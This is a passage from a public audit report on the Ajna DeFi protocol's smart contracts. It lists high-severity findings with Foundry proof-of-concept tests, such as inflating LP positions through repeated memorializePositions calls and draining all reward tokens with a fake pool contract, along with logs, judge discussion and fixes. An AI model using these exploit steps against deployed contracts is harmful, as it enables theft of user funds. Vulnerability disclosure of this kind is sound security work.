Running 1 test for test/unit/StandardFunding.t.sol:StandardFundingGrantFundTest
[PASS] testPoCTreasuryPrecisionLoss() (gas: 3451937)
Treasury initial amount: 500000000000000000000000000
Treasury after start, deduct 3%: 485000000000000000000000000
GBC: 15000000000000000000000000
totalTokensRequested: 13500000000000000000000000
Total claimed rewards: 1500000000000000000000000
Treasury at the end of the period (should be the same as started): 485000000000000000000000000
Treasury at the new period (got updated): 485000000000000000000000000
treasury actual balance: 498500000000000000000000000
Test result: ok. 1 passed; 0 failed; finished in 1.20s
Tools Used
- Manual review
- Foundry
Recommended Mitigation Steps
If it is safe to assume that all periods will always have 10% for delegation rewards, the contract should calculate only 90% of fundsAvailable
when updating the treasury.
File: ajna-grants/src/grants/base/StandardFunding.sol
197: function _updateTreasury(
198: uint24 distributionId_
199: ) private {
200: bytes32 fundedSlateHash = _distributions[distributionId_].fundedSlateHash;
201: uint256 fundsAvailable = _distributions[distributionId_].fundsAvailable;
216: // readd non distributed tokens to the treasury
+217: treasury += ((fundsAvailable * 9/10) - totalTokensRequested);
The claimDelegateReward()
function uses Maths.wmul()
, which automatically rounds the multiplication result up or down. For example, Maths.wmul(1, 0.5 * 1e18) = 1
(rounding up) while Maths.wmul(1, 0.49 * 1e18) = 0
(rounding down). As a result, rewardClaimed_
can lose precision for small decimal amounts and token holders typically have small fractions of tokens down to 1 wei
. It is uncertain, but the total actual paid rewards could be more than 10% if rounded up, resulting in an insignificant loss of precision in the treasury. However, if rewardClaimed_
is deducted from fundsAvailable
, it could lead to an integer underflow revert if fundsAvailable - totalClaimed - totalTokensRequested = 100% - 10.xx% - 90%
, which exceeds 100%.
Picodes (judge) increased severity to High
MikeHathaway (Ajna) confirmed via duplicate issue #263
[H-05] Incorrect calculation of the remaining updatedRewards
leads to possible underflow error
Submitted by Haipls, also found by Koolex and Vagner
keeps track of the total number of rewards collected per epoch for all pools:
File: 2023-05-ajna\ajna-core\src\RewardsManager.sol
73: /// @dev `epoch => rewards claimed` mapping.
74: mapping(uint256 => uint256) public override rewardsClaimed;
75: /// @dev `epoch => update bucket rate rewards claimed` mapping.
76: mapping(uint256 => uint256) public override updateRewardsClaimed;
And the rewardsCap
calculation when calculating the reward applies only to the pool, which leads to a situation when the condition is fulfilled rewardsClaimedInEpoch + updatedRewards_ >= rewardsCap
, But rewardsCap
is less than rewardsClaimedInEpoch
File: 2023-05-ajna\ajna-core\src\RewardsManager.sol
-543: uint256 rewardsCapped = Maths.wmul(REWARD_CAP, totalBurnedInPeriod);
545: // Check rewards claimed - check that less than 80% of the tokens for a given burn event have been claimed.
-546: if (rewardsClaimedInEpoch_ + newRewards_ > rewardsCapped) {
548: // set claim reward to difference between cap and reward
-549: newRewards_ = rewardsCapped - rewardsClaimedInEpoch_; // @audit rewardsCapped can be less then rewardsClaimedInEpoch_
550: }
719: uint256 rewardsCap = Maths.wmul(UPDATE_CAP, totalBurned); // @audit in one pool
-720: uint256 rewardsClaimedInEpoch = updateRewardsClaimed[curBurnEpoch];
722: // update total tokens claimed for updating bucket exchange rates tracker
723: if (rewardsClaimedInEpoch + updatedRewards_ >= rewardsCap) {
724: // if update reward is greater than cap, set to remaining difference
-725: updatedRewards_ = rewardsCap - rewardsClaimedInEpoch; // @audit rewardsCap can be less then rewardsClaimedInEpoch
726: }
728: // accumulate the full amount of additional rewards
-729: updateRewardsClaimed[curBurnEpoch] += updatedRewards_; // @audit increase per epoch
Which causes an underflow
erorr in the result updatedRewards_ = rewardsCap - rewardsClaimedInEpoch
where rewardsCap < rewardsClaimedInEpoch
, this error leads to a transaction fail, which will further temporarily/permanently block actions with NFT as unstake/claimRewards
for pools in which rewardsCap
will fail less than the total rewardsClaimedInEpoch
We have 2 instances of this problem::
- during the call
- during the call
A failure in any of these will result in users of certain pools being unable to withdraw their NFTs as well as the reward.
Proof of Concept
Let’s take a closer look at the problem and why this is possible:
- We have a general calculation of rewards taken per epoch:
File: ajna-core\src\RewardsManager.sol
71: /// @dev `epoch => rewards claimed` mapping.
72: mapping(uint256 => uint256) public override rewardsClaimed;
73: /// @dev `epoch => update bucket rate rewards claimed` mapping.
74: mapping(uint256 => uint256) public override updateRewardsClaimed;
- The state is updated for the epoch by the amount calculated for each pool:
File: ajna-core\src\RewardsManager.sol
396: for (uint256 epoch = lastClaimedEpoch; epoch < epochToClaim_; ) {
410: // update epoch token claim trackers
411: rewardsClaimed[epoch] += nextEpochRewards;
413: }
676: uint256 curBurnEpoch = IPool(pool_).currentBurnEpoch();
728: // accumulate the full amount of additional rewards
729: updateRewardsClaimed[curBurnEpoch] += updatedRewards_;
- At the time of calculation of the reward for the update:
File: 2023-05-ajna\ajna-core\src\RewardsManager.sol
526: (
527: ,
528: // total interest accumulated by the pool over the claim period
+529: uint256 totalBurnedInPeriod,
530: // total tokens burned over the claim period
531: uint256 totalInterestEarnedInPeriod
532: ) = _getPoolAccumulators(ajnaPool_, nextEpoch_, epoch_);
534: // calculate rewards earned
+543: uint256 rewardsCapped = Maths.wmul(REWARD_CAP, totalBurnedInPeriod);
545: // Check rewards claimed - check that less than 80% of the tokens for a given burn event have been claimed.
546: if (rewardsClaimedInEpoch_ + newRewards_ > rewardsCapped) {
548: // set claim reward to difference between cap and reward
+549: newRewards_ = rewardsCapped - rewardsClaimedInEpoch_; // @audit
550: }
We have a situation where rewardsClaimedInEpoch_
has been updated by other pools to something like 100e18
and rewardsCapped
for the other pool was 30e18
, resulting in:
rewardsClaimedInEpoch_ + newRewards_ > rewardsCapped
and of course we catch the underflow at the time of calculating the remainder, 30e18 - 100e18
, since there is no remainder
newRewards_ = rewardsCapped - rewardsClaimedInEpoch_
To check the problem, you need to raise rewardsClaimedInEpoch_
more than the rewardsCap
of a certain pool, with the help of other pools, rewardsCap
is a percentage of burned tokens in the pool… so it’s possible.
Tools Used
- Manual review
- Foundry
Recommended Mitigation Steps
- Add additional requirements that if
rewardsClaimedInEpoch > rewardsCap
should be zero, not need calculate remaining difference.
Picodes (judge) decreased severity to Medium and commented:
Giving Medium severity for “Assets not at direct risk, but the function of the protocol or its availability could be impacted”
Hi @Picodes - I would like to ask you to reconsider the severity of the issue. You’ve classified it as
-Assets not at direct risk, but the function of the protocol or its availability could be impacted
.Upon review, in my opinion, this issue leans more towards HIGH -
Assets can be stolen/lost/compromised directly (or indirectly if there is a valid attack path that does not have hand-wavy hypotheticals)
.Below, I will attempt to present my reasoning and why I think this way:
I’ve considered
metrics to determine severity:
- Consequences
- The likelihood of it happening
And came up with the following results:
The consequence of this issue is that in the event of it happening, NFTs are blocked on the RewardsManager.sol contract with no possibility of their further withdrawal. This is critical and falls under:
Assets can be stolen/lost/compromised directly
. Moreover, these are not just NFTs, they are LP positions.When this problem occurs, the ability for
of the affected pools is closed due to a mathematical error, leading to a simple blockage of interaction with these pools. As it becomes impossible to process the reward update for a given epoch. For pools that weren’t affected and managed to process before, they will be able to operate further until the situation repeats.The main point in deciding whether it’s
is how likely this problem is to occur.Here I looked at the dependence in calculations on the number of pools
uint256 rewardsCapped = Maths.wmul(REWARD_CAP, totalBurnedInPeriod); // Check rewards claimed - check that less than 80% of the tokens for a given burn event have been claimed. if (rewardsClaimedInEpoch_ + newRewards_ > rewardsCapped) { // set claim reward to difference between cap and reward newRewards_ = rewardsCapped - rewardsClaimedInEpoch_; }
is a value that sums up across all pools
is a value related to the calculation of a single pool and depends on the number of coins burned in the epoch in the selected poolAnd there arises a situation when
n1 - (n2 + n3...+ nn)
by pools. In reality, it’s all more complex and depends on the number of burned coins in the pools, but the essence is that the more pools we have, the higher the chances that this condition simply reverts. And this is no longer an unlikely situation.Also an example of a highly probable situation:
When there’s a HUGE pool and several small ones in the middle. It’s enough for only the HUGE pool to update the epoch’s reward. This will cause a problem with the condition’s execution for all other small pools
This can also be a vector of an attacker who purposely burns an extra amount of coins to increase the reward update on the pool. And causes positions blocking in the contract.
After these considerations, I would like you to reconsider the severity of the problem, as we have two points:
- Direct blocking of funds on the contract.
- The situation is not theoretical.
I hope my thoughts will be useful. I understand that I can be wrong and I hope you can clarify if I am not understanding something correctly. Thank you.
Picodes (judge) increased severity to High and commented:
Hi @Haipls - thanks for your comment. Upon review, I agree with your take and will upgrade to High.
[H-06] The lender could possibly lose unclaimed rewards in case a bucket goes bankrupt
Submitted by Koolex
When the lender calls PositionManager.memorializePositions
method the following happens:
- Records bucket indexes along with its deposit times and lpBalances
- Transfers LP ownership from the lender to PositionManager contract.
In point 1, it checks if there is a previous deposit and the bucket went bankrupt after prior memorialization, then it zero out the previous tracked LP. However, the lender could still have unclaimed rewards. In this case, the lender loses the rewards due to the lack of claiming rewards before zeroing out the previous tracked LP balance. If you check claim rewards functionality in RewardsManager, the bucket being not bankrupt is not a requirement. Please note that claiming rewards relies on the tracked LP balance in PositionManager.
Proof of Concept
check for previous deposits and zero out the previous tracked LP if bucket is bankrupt
// check for previous deposits if (position.depositTime != 0) { // check that bucket didn't go bankrupt after prior memorialization if (_bucketBankruptAfterDeposit(pool, index, position.depositTime)) { // if bucket did go bankrupt, zero out the LP tracked by position manager position.lps = 0; } }
In RewardsManager, check
method. there is no a check for bucket’s bankruptcy.https://github.com/code-423n4/2023-05-ajna/blob/main/ajna-core/src/RewardsManager.sol#L114
Recommended Mitigation Steps
On memorializePositions, check if the lender already claimed his/her rewards before zeroing out the previous tracked LP.
That is by design and we acknowledge that documentation of bucket bankruptcy can be improved. When a bucket goes bankrupt (which shouldn’t happen often but only when there’s bad debt in pool to settle) the lender won’t lose only their rewards but will also lose all the shares in that bucket / LP (which has higher impact than rewards).
Also the recommendation of:
On memorializePositions, check if the lender already claimed his/her rewards before zeroing out the previous tracked LP.
Would imply making position manager contract aware of rewards manager contract and we don’t want to couple those 2 in reference implementation. However, additional position and rewards manager could be developed by 3rd parties and could take into consideration this recommendation.
[H-07] User can exponentially increase the value of their position through the memorializePositions
Submitted by BPZ, also found by sces60107, xuwinnie, Koolex, ast3ros, Haipls, and SpicyMeatball
The PositionManager contract allows a lender to mint an NFT that will be representative of their lp positions. This is done by minting an NFT and then invoking the memorializePositions function which will assign their lp positions to the respective NFT. However, while the memorializePositions function will update the lp balances based on the entirety of the lender’s lp balance for a given index bucket within the pool, the Pool contract will update the lender’s balance based on the minimum value between the allowed amount and the lender’s balance. This means that, if a user specifies an allowance for the PositionManager contract by calling the increaseLPAllowance function that is less than their total balance for a respective position before invoking the memorializePositions function, their position’s lp balance tracked by the PositionManager’s state will increase by the entirety of their balance while their position that is tracked by the Pool’s state will only decrease by the specified allowance. The impact of this is that a lender can exponentially increase the value of their position by repeating the steps of specifying a minimum allowance for the PositionManager for their positions and then invoking memorializePositions until their lp position that is tracked by the Pool’s state is 0. The lender can then stake this exponentially overvalued position through the RewardsManager contract allowing them to receive substantially more rewards for their position then should be allotted. The direct implications of this are that the user will be rewarded a substantial amount of AJNA reward tokens which are directly redeemable for the Pool’s quote tokens through its Redeemable Reserve and, additionally, over-value the user’s influence on the protocol’s proposal funding because a user’s votes are weighted by the amount of AJNA tokens they hold. We believe this to be a high severity vulnerability because it directly affects user funds and the functionality of the protocol in general.
Proof of Concept
The described vulnerability occurs when a lender specifies allowances for the PositionManager contract that are less than their lp balance for each respective index through the increaseLPAllowance function and then invokes the memorializePositions function. The result of this is that the user’s lp balance tracked by the PositionManager’s state will increment by the position’s balance while the lp balance tracked by the Pool’s state will only decrement by the specified allowance. A user can repeat this process through multiple iterations until their respective lp balances with the Pool contract are 0 which will exponentially increase the value of their position. Please see the following test case for a POC simulating the effect of this described vulnerability on a user’s position:
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.14;
import "forge-std/console.sol";
import {Base64} from "@base64-sol/base64.sol";
import "tests/forge/unit/PositionManager.t.sol";
* @title Proof of Concept
* @notice Simulates the effect of the described vulnerability where a user
* can exponentially increase the value of their position by:
* 1- only approving the `PositionManager` for a min amount of their position
* 2- invoking 'memorializePositions' on their position's respective NFT
* 3- repeating these steps until their respective position's Pool lp balance is 0
* @dev This test case can be implemented and run from the ajna-core/tests/forge directory
contract POC is PositionManagerERC20PoolHelperContract {
function testMemorializePositionsWithMinApproval() external {
uint256 intialLPBalance;
uint256 finalLPBalance;
address testsAddress = makeAddr("testsAddress");
uint256 mintAmount = 10000 * 1e18;
_mintQuoteAndApproveManagerTokens(testsAddress, mintAmount);
// Call pool contract directly to add quote tokens
uint256[] memory indexes = new uint256[](3);
indexes[0] = 2550;
indexes[1] = 2551;
indexes[2] = 2552;
from: testsAddress,
amount: 3_000 * 1e18,
index: indexes[0]
from: testsAddress,
amount: 3_000 * 1e18,
index: indexes[1]
from: testsAddress,
amount: 3_000 * 1e18,
index: indexes[2]
// Mint an NFT to later memorialize existing positions into.
uint256 tokenId = _mintNFT(testsAddress, testsAddress, address(_pool));
// Pool lp balances before.
(uint256 poolLPBalanceIndex1, ) = _pool.lenderInfo(
(uint256 poolLPBalanceIndex2, ) = _pool.lenderInfo(
(uint256 poolLPBalanceIndex3, ) = _pool.lenderInfo(
console.log("\n Pool lp balances before:");
console.log("bucket %s: %s", indexes[0], poolLPBalanceIndex1);
console.log("bucket %s: %s", indexes[1], poolLPBalanceIndex2);
console.log("bucket %s: %s", indexes[2], poolLPBalanceIndex3);
intialLPBalance =
poolLPBalanceIndex1 +
poolLPBalanceIndex2 +
// PositionManager lp balances before.
(uint256 managerLPBalanceIndex1, ) = _positionManager.getPositionInfo(
(uint256 managerLPBalanceIndex2, ) = _positionManager.getPositionInfo(
(uint256 managerLPBalanceIndex3, ) = _positionManager.getPositionInfo(
console.log("\n PositionManger lp balances before:");
console.log("bucket %s: %s", indexes[0], managerLPBalanceIndex1);
console.log("bucket %s: %s", indexes[1], managerLPBalanceIndex1);
console.log("bucket %s: %s", indexes[2], managerLPBalanceIndex1);
"\n <--- Repeatedly invoke memorializePositions with a min allowance set for each tx --->"
// Approve the PositionManager for only 1 token in each bucket.
uint256[] memory amounts = new uint256[](3);
amounts[0] = 1 * 1e18;
amounts[1] = 1 * 1e18;
amounts[2] = 1 * 1e18;
// Continuosly invoke memorializePositions with the min allowance
// until Pool lp balance is 0.
while (
poolLPBalanceIndex1 != 0 &&
poolLPBalanceIndex2 != 0 &&
poolLPBalanceIndex3 != 0
) {
// Increase manager allowance.
// Memorialize quote tokens into minted NFT.
memory memorializeParams = IPositionManagerOwnerActions
.MemorializePositionsParams(tokenId, indexes);
// Get new Pool lp balances.
(poolLPBalanceIndex1, ) = _pool.lenderInfo(
(poolLPBalanceIndex2, ) = _pool.lenderInfo(
(poolLPBalanceIndex3, ) = _pool.lenderInfo(
// Pool lp balances after.
console.log("\n Pool lp balances after:");
console.log("bucket %s: %s", indexes[0], poolLPBalanceIndex1);
console.log("bucket %s: %s", indexes[1], poolLPBalanceIndex2);
console.log("bucket %s: %s", indexes[2], poolLPBalanceIndex3);
// PositionManager lp balances after.
(managerLPBalanceIndex1, ) = _positionManager.getPositionInfo(
(managerLPBalanceIndex2, ) = _positionManager.getPositionInfo(
(managerLPBalanceIndex3, ) = _positionManager.getPositionInfo(
console.log("\n PositionManger lp balances after:");
console.log("bucket %s: %s", indexes[0], managerLPBalanceIndex1);
console.log("bucket %s: %s", indexes[1], managerLPBalanceIndex1);
console.log("bucket %s: %s \n", indexes[2], managerLPBalanceIndex1);
finalLPBalance =
managerLPBalanceIndex1 +
managerLPBalanceIndex2 +
// Assert that the initial and ending balances are equal.
assertEq(intialLPBalance, finalLPBalance);
For reference the log outputs that display the overall change in the users position are the following:
Pool lp balances before:
bucket 2550: 3000000000000000000000
bucket 2551: 3000000000000000000000
bucket 2552: 3000000000000000000000
PositionManger lp balances before:
bucket 2550: 0
bucket 2551: 0
bucket 2552: 0
<--- Repeatedly invoke memorializePositions with a min allowance set for each tx --->
Pool lp balances after:
bucket 2550: 0
bucket 2551: 0
bucket 2552: 0
PositionManger lp balances after:
bucket 2550: 4501500000000000000000000
bucket 2551: 4501500000000000000000000
bucket 2552: 4501500000000000000000000
Error: a == b not satisfied [uint]
Expected: 13504500000000000000000000
Actual: 9000000000000000000000
The test case simulates a user that has created a position by providing 9,000 tokens as liquidity into a pool depositing 3,000 tokens, each, into price buckets 2550, 2551, and 2552. An NFT is then minted for the user. The test case then iteratively approves the PositionManager contract for an allowance of 1 token for each price bucket and invokes the memorializePositions function, repeating these steps until the Pool lp balance for their positions are 0. As can be seen by the log output, the value of the position per price bucket dramatically increases with the position in each bucket being valued at 4,501,500 tokens by the end of the test. In total, the user’s position has increased in value from 9,000 tokens to 13,504,500 tokens.
Tools Used
Recommended Mitigation Steps
It is recommended to implement a check within the memorializePositions function that will ensure that a user has specified an allowance at least equal to their lp balance at each respective index, reverting with a custom error if not true. For example, the function could be refactored to the following where the mentioned check is implemented here:
function memorializePositions(
MemorializePositionsParams calldata params_
) external override {
EnumerableSet.UintSet storage positionIndex = positionIndexes[params_.tokenId];
IPool pool = IPool(poolKey[params_.tokenId]);
address owner = ownerOf(params_.tokenId);
uint256 indexesLength = params_.indexes.length;
uint256 index;
for (uint256 i = 0; i < indexesLength; ) {
index = params_.indexes[i];
// record bucket index at which a position has added liquidity
// slither-disable-next-line unused-return
(uint256 lpBalance, uint256 depositTime) = pool.lenderInfo(index, owner);
// check that specified allowance is at least equal to the lp balance
uint256 allowance = pool.lpAllowance(index, address(this), owner);
if(allowance < lpBalance) revert AllowanceTooLow();
Position memory position = positions[params_.tokenId][index];
// check for previous deposits
if (position.depositTime != 0) {
// check that bucket didn't go bankrupt after prior memorialization
if (_bucketBankruptAfterDeposit(pool, index, position.depositTime)) {
// if bucket did go bankrupt, zero out the LP tracked by position manager
position.lps = 0;
// update token position LP
position.lps += lpBalance;
// set token's position deposit time to the original lender's deposit time
position.depositTime = depositTime;
// save position in storage
positions[params_.tokenId][index] = position;
unchecked { ++i; }
// update pool LP accounting and transfer ownership of LP to PositionManager contract
pool.transferLP(owner, address(this), params_.indexes);
emit MemorializePosition(owner, params_.tokenId, params_.indexes);
[H-08] Claiming accumulated rewards while the contract is underfunded can lead to a loss of rewards
Submitted by aviggiano, also found by 0xSmartContract, Evo, Jerry0x, tsvetanovv, Audinarey, kenta, 0xcm, patitonar, sakshamguruji, BGSecurity, Audit_Avengers, mrvincere, bytes032, devscrooge, Haipls, Dug, ladboy233, Bauchibred, Bauchibred, Bauchibred, 0xTheC0der, ABAIKUNANBAEV, and TS
The claimable rewards for an NFT staker are capped at the Ajna token balance at the time of claiming, which can lead to a loss of rewards if the RewardsManager
contract is underfunded with Ajna tokens.
Loss of rewards if the RewardsManager
contract is underfunded with Ajna tokens.
Proof of Concept
The RewardsManager
contract keeps track of the rewards earned by an NFT staker. The accumulated rewards are claimed by calling the RewardsManager.claimRewards
function. Internally, the RewardsManager._claimRewards
function transfers the accumulated rewards to the staker.
However, the transferrable amount of Ajna token rewards are capped at the Ajna token balance at the time of claiming. If the accumulated rewards are higher than the Ajna token balance, the claimer will receive fewer rewards than expected. The remaining rewards cannot be claimed at a later time as the RewardsManager
contract does not keep track of the rewards that were not transferred.
This issue was already reported on Sherlock’s audit contest, and was marked as Fixed
by the Ajna team (Issue M-8).
Nevertheless, the problem still exists, as it can be seen through the following test:
diff --git a/ajna-core/src/RewardsManager.sol b/ajna-core/src/RewardsManager.sol
index 314b476..6642a4e 100644
--- a/ajna-core/src/RewardsManager.sol
+++ b/ajna-core/src/RewardsManager.sol
@@ -582,6 +582,7 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
+ // @audit-issue rewardsEarned (ClaimReward event) is not necessarily what's transferred (Transfer event)
emit ClaimRewards(
@@ -812,6 +813,7 @@ contract RewardsManager is IRewardsManager, ReentrancyGuard {
// check that rewards earned isn't greater than remaining balance
// if remaining balance is greater, set to remaining balance
uint256 ajnaBalance = IERC20(ajnaToken).balanceOf(address(this));
+ // @audit-issue rewardsEarned (ClaimReward event) is not necessarily what's transferred (Transfer event)
if (rewardsEarned_ > ajnaBalance) rewardsEarned_ = ajnaBalance;
if (rewardsEarned_ != 0) {
diff --git a/ajna-core/tests/forge/unit/Rewards/RewardsDSTestPlus.sol b/ajna-core/tests/forge/unit/Rewards/RewardsDSTestPlus.sol
index 93fe062..74a70d5 100644
--- a/ajna-core/tests/forge/unit/Rewards/RewardsDSTestPlus.sol
+++ b/ajna-core/tests/forge/unit/Rewards/RewardsDSTestPlus.sol
@@ -162,6 +162,8 @@ abstract contract RewardsDSTestPlus is IRewardsManagerEvents, ERC20HelperContrac
uint256 currentBurnEpoch = IPool(pool).currentBurnEpoch();
vm.expectEmit(true, true, true, true);
emit ClaimRewards(from, pool, tokenId, epochsClaimed, reward);
+ vm.expectEmit(true, true, true, true);
+ emit Transfer(address(_rewardsManager), from, reward);
_rewardsManager.claimRewards(tokenId, currentBurnEpoch);
assertEq(_ajnaToken.balanceOf(from), fromAjnaBal + reward);
@@ -267,8 +269,8 @@ abstract contract RewardsHelperContract is RewardsDSTestPlus {
_poolTwo = ERC20Pool(_poolFactory.deployPool(address(_collateralTwo), address(_quoteTwo), 0.05 * 10**18));
// provide initial ajna tokens to staking rewards contract
- deal(_ajna, address(_rewardsManager), 100_000_000 * 1e18);
- assertEq(_ajnaToken.balanceOf(address(_rewardsManager)), 100_000_000 * 1e18);
+ deal(_ajna, address(_rewardsManager), 40 * 1e18);
+ assertEq(_ajnaToken.balanceOf(address(_rewardsManager)), 40 * 1e18); // @audit-issue RewardsManager is now underfunded, contains less AJNA than users' rewards
// create a new test borrower with quote and collateral sufficient to draw a specified amount of debt
diff --git a/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol b/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol
index 4100e9f..3eaacd7 100644
--- a/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol
+++ b/ajna-core/tests/forge/unit/Rewards/RewardsManager.t.sol
@@ -1843,6 +1843,15 @@ contract RewardsManagerTest is RewardsHelperContract {
assertLt(_ajnaToken.balanceOf(_minterOne), tokensToBurn);
+ // try to claim again and get remaining rewards, will revert with `AlreadyClaimed()`
+ _claimRewards({
+ pool: address(_pool),
+ from: _minterOne,
+ tokenId: tokenIdOne,
+ reward: 40.899689081331351737 * 1e18,
+ epochsClaimed: _epochsClaimedArray(1, 0)
+ });
Since the problem still exists, I am reporting it here. You can find below a conversation with Ian Harvey from the Ajna team, where we discuss how the problem was incorrectly marked as solved:
aviggiano — Yesterday at 4:37 PM Hi there
I am reviewing the Ajna smart contracts and I have a question regarding previous audit reports.
It seems like some findings are marked as “Fixed” but I believe they were not (see M-8).
Should I re-submit a previous finding, if the contract is in scope? or are those considered out of scope?
M-8 is this one
Ian Harvey | Ajna — Yesterday at 7:01 PM
Ian Harvey | Ajna — Yesterday at 7:11 PM
That was solved here -> https://github.com/code-423n4/2023-05-ajna/blob/276942bc2f97488d07b887c8edceaaab7a5c3964/ajna-core/src/RewardsManager.sol#L811
Tools Used
Past audit report
Recommended Mitigation Steps
- Consider reverting if there are insufficient Ajna tokens available as rewards. This is the best immediate solution to the problem.
- Create unit tests for each issue identified in the audit report and confirm that it has been properly addressed. This will prevent recurring problems where the development team believes an issue has been resolved, but in reality, it has not.
- Create a separate pull request for each finding and mark the issue in the audit table. This will help developers and auditors verify whether the issue has been resolved or not, and will make future audits more manageable, ultimately improving the overall quality and security of the protocol.
Picodes (judge) increased severity to High
MikeHathaway (Ajna) confirmed via duplicate issue #361
[H-09] User can avoid bankrupting by calling PositionManager.moveLiquidity
where to index is bankrupted index
Submitted by rvierdiiev, also found by J4de, SpicyMeatball, and volodya
Bucket could become insolvent and in that case all LP within the bucket are zeroed out (lenders lose all their LP). Because of that, PositionManager.reedemPositions
will not allow to redeem index that is bankrupted.
When user wants to move his LPs from one bucket to another he can call PositionManager.moveLiquidity
where he will provide from and to indexes.
function moveLiquidity(
MoveLiquidityParams calldata params_
) external override mayInteract(params_.pool, params_.tokenId) nonReentrant {
Position storage fromPosition = positions[params_.tokenId][params_.fromIndex];
MoveLiquidityLocalVars memory vars;
vars.depositTime = fromPosition.depositTime;
// handle the case where owner attempts to move liquidity after they've already done so
if (vars.depositTime == 0) revert RemovePositionFailed();
// ensure bucketDeposit accounts for accrued interest
// retrieve info of bucket from which liquidity is moved
) = IPool(params_.pool).bucketInfo(params_.fromIndex);
// check that bucket hasn't gone bankrupt since memorialization
if (vars.depositTime <= vars.bankruptcyTime) revert BucketBankrupt();
// calculate the max amount of quote tokens that can be moved, given the tracked LP
vars.maxQuote = _lpToQuoteToken(
EnumerableSet.UintSet storage positionIndex = positionIndexes[params_.tokenId];
// remove bucket index from which liquidity is moved from tracked positions
if (!positionIndex.remove(params_.fromIndex)) revert RemovePositionFailed();
// update bucket set at which a position has liquidity
// slither-disable-next-line unused-return
// move quote tokens in pool
) = IPool(params_.pool).moveQuoteToken(
Position storage toPosition = positions[params_.tokenId][params_.toIndex];
// update position LP state
fromPosition.lps -= vars.lpbAmountFrom;
toPosition.lps += vars.lpbAmountTo;
// update position deposit time to the from bucket deposit time
toPosition.depositTime = vars.depositTime;
emit MoveLiquidity(
As you can see from
bucket is checked to be not bankrupted before the moving.
And after the move, LPs of from
and to
buckets are updated.
Also depositTime
of to
bucket is updated to from.depositTime
The problem here is that to
bucket was never checked to be not bankrupted.
Because of that it’s possible that bankrupted to
bucket now becomes not bankrupted as their depositTime is updated now.
This is how this can be used by attacker.
- Attacker has lp shares in the bucket, linked to token and this bucket became bankrupt.
- Then attacker mints small amount of LP in the Pool and then memorizes this index to the token.
- Attacker calls
: new bucket andto
: bankrupt bucket. - Now attacker can redeem his lp shares from bankrupt bucket as depositedTime is updated now.
As result, attacker was able to steal LPs of another people from PositionManager
Tools Used
Recommended Mitigation Steps
In case if to
bucket is bankrupt, then clear LP for it before adding moved lp shares.
[H-10] missing isEpochClaimed
Submitted by Jorgect, also found by shealtielanz and ABAIKUNANBAEV
User can claim rewards even when is already claimed
Proof of Concept
The _claimRewards function is using to calculate and send the reward to the caller but this function is no validating if isEpochClaimed mapping is true due that in claimRewards function is validated, see the stament in the following lines:
file: ajna-core/src/RewardsManager.sol
function claimRewards(
uint256 tokenId_,
uint256 epochToClaim_
) external override {
StakeInfo storage stakeInfo = stakes[tokenId_];
if (msg.sender != stakeInfo.owner) revert NotOwnerOfDeposit();
if (isEpochClaimed[tokenId_][epochToClaim_]) revert AlreadyClaimed(); // checking if the epoch was claimed;
Now the moveStakedLiquidity is calling _claimRewards too without validate isEpochClaimed mapping:
file: ajna-core/src/RewardsManager.sol
function moveStakedLiquidity(
uint256 tokenId_,
uint256[] memory fromBuckets_,
uint256[] memory toBuckets_,
uint256 expiry_
) external override nonReentrant {
StakeInfo storage stakeInfo = stakes[tokenId_];
if (msg.sender != stakeInfo.owner) revert NotOwnerOfDeposit();
uint256 fromBucketLength = fromBuckets_.length;
if (fromBucketLength != toBuckets_.length)
revert MoveStakedLiquidityInvalid();
address ajnaPool = stakeInfo.ajnaPool;
uint256 curBurnEpoch = IPool(ajnaPool).currentBurnEpoch();
// claim rewards before moving liquidity, if any
_claimRewards(stakeInfo, tokenId_, curBurnEpoch, false, ajnaPool); // no checking is isEpochClaimed is true and revert
Also we can see in the _claimRewards function there is no validation is isEpochClaimed is true, this allow a malicius user claimReward first and then move his liquidity to other bucket or the same bucket claiming the reward each time that he want.
function _claimRewards(
StakeInfo storage stakeInfo_,
uint256 tokenId_,
uint256 epochToClaim_,
bool validateEpoch_,
address ajnaPool_
) internal {
// revert if higher epoch to claim than current burn epoch
if (
validateEpoch_ &&
epochToClaim_ > IPool(ajnaPool_).currentBurnEpoch()
) revert EpochNotAvailable();
// update bucket exchange rates and claim associated rewards
uint256 rewardsEarned = _updateBucketExchangeRates(
rewardsEarned += _calculateAndClaimRewards(tokenId_, epochToClaim_);
uint256[] memory burnEpochsClaimed = _getBurnEpochsClaimed(
emit ClaimRewards(
// update last interaction burn event
stakeInfo_.lastClaimedEpoch = uint96(epochToClaim_);
// transfer rewards to sender
Recommended Mitigation Steps
Check if the isEpochClaime is true and revert in the _claimReward function
if (isEpochClaimed[tokenId_][epochToClaim_]) revert AlreadyClaimed();
ith-harvey (Ajna) disputed and commented:
The series of calls they are suggesting are possible:
claimRewards() -> get rewards
moveStakedLiquidity() -> get rewardsThey should not be able to get these rewards because
iterates from last claimed epoch.
[H-11] RewardsManager fails to validate pool_
when updating exchange rates allowing rewards to be drained
Submitted by vakzz, also found by 0xWaitress, SpicyMeatball, and 0xStalin
The updateBucketExchangeRatesAndClaim
method is designed to reward people for keeping the current exchange rate up to date (it has the following description: “Caller can claim 5%
of the rewards that have accumulated to each bucket since the last burn event, if it hasn’t already been updated”).
The issue is that there is no check on the pool_
to ensure that is a valid ajna pool or that it is a pool from a currently staked token.
This means that an attacker can supply their own contract to control all of the values used to calculate the reward amount, allowing them to transfer an arbitrary amount of reward tokens (up to the balance of the rewards manager).
Proof of Concept
The following test can be placed in https://github.com/code-423n4/2023-05-ajna/tree/a51de1f0119a8175a5656a2ff9d48bbbcb4436e7/ajna-core/tests/forge/unit/Rewards as StealRewards.t.sol
and then run with forge test -m testStealRewards -vv
, showing that an attacker can steal all of the ajna tokens held by the rewards manager:
$ forge test -m testStealRewards -vv
Running 1 test for tests/forge/unit/Rewards/StealRewards.t.sol:StealRewardsTest
[PASS] testStealRewards() (gas: 494833)
Rewards balance before: 100000000000000000000000000
Hacker balance before : 0
Rewards balance after : 0
Hacker balance after : 100000000000000000000000000
Test result: ok. 1 passed; 0 failed; finished in 6.57s
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.14;
import 'src/RewardsManager.sol';
import 'src/PositionManager.sol';
import '@std/Test.sol';
import '@std/Vm.sol';
contract StealRewards {
ERC20 ajnaToken;
